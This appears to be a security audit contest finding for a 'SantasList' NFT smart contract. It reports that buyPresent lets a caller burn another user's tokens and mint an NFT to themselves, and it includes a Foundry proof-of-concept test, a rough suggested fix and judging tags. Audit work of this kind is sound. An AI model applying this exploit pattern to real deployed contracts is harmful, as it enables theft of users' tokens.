Submission Details
Severity:
Malicious user can call ```buyPresent``` with address collecting present to get a NFT
Summary
Malicious user can call buyPresent with address having collected present to get a NFT
Vulnerability Details
A user can monitor addresses that has call collectPresent function. Then he immediately call buyPresent function with addresses that just called collectPresent function. Then he can get a NFT for free.
Impact
User can call buyPresest function to get a NFT for free
Tools Used
foundry
POC
function testMalicouslyCallBuyingPresent() public {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.EXTRA_NICE);
santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
santasList.collectPresent();
vm.stopPrank();
vm.prank(user2);
santasList.buyPresent(user);
assertEq(santasList.balanceOf(user), 1);
assertEq(santaToken.balanceOf(user), 0);
assertEq(santasList.balanceOf(user2), 1);
}
Recommendations
The ```buyPresent`` function can be rewrited like this:
i_santaToken.burn(msg.sender);
_mintAndIncrement();
transferFrom(msg.sender,presentReceiver,s_tokenCounter-1);
Updates
Lead Judging Commences
inallhonesty over 1 year ago
Submission Judgement Published Assigned finding tags:
buyPresent should use msg.sender
Current implementation allows a malicious actor to burn someone else's tokens as the burn function doesn't actually check for approvals.
buyPresent should send to presentReceiver
Rewards breakdown
nSLOC
116This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.